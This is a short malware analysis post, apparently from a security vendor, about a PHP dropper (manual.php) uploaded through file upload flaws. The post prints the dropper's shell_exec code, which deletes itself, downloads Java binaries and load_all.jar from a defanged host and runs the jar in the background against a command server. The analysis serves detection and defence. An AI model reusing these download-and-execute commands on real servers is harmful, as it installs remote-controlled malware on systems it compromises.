load_all.jar

Today we found Java based malware. If attacker found File Upload vulnerability on the server, then it upload manual.php based malware, which trying load load_all.jar to server and running it background.

Manual.php

$out = shell_exec("java -version 2>&1");
preg_match("/version\s+\"1\.(\d+)\./",$out,$matches);
$ver = 0;
if($matches)$ver = (int)$matches[1];

This manual.php uses lot off shell_exec function, but if you have disabled in php.ini, you are secure from this malware.

Check java version

If this malware can’t find installed JAVA in server, it downloads JAVA binary files to the server:

shell_exec("export JAVA_HOME=".dirname(__FILE__)."/tmp");

shell_exec("rm ".__FILE__);

shell_exec("pkill java");
if((defined('PHP_INT_SIZE'))&&(PHP_INT_SIZE == 8)){
shell_exec("wget hxxp://recaptcha-in.pw/64/tmp.tar.gz");
shell_exec("tar -xzf tmp.tar.gz");
shell_exec("rm tmp.tar.gz");
}else{
shell_exec("wget hxxp://recaptcha-in.pw/32/tmp.tar.gz");
shell_exec("tar -xzf tmp.tar.gz");
shell_exec("rm tmp.tar.gz");

There is also linux bash rm command, so this removes it (manual.php) also from the server.

Execution load_all.jar

Finally, it download again load_all. jar file, only if it needed before download JAVA binaries also.

chdir("tmp/bin");
shell_exec("rm load_all.jar");
shell_exec("wget hxxp://recaptcha-in.pw/load_all.jar");
shell_exec("chmod 777 -R .");
shell_exec("nohup ./java -jar load_all.jar hxxp://83.166.243.65/b");

Last command starts this JAVA malware running in background task and connect to Remote Command Server.

Final Words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.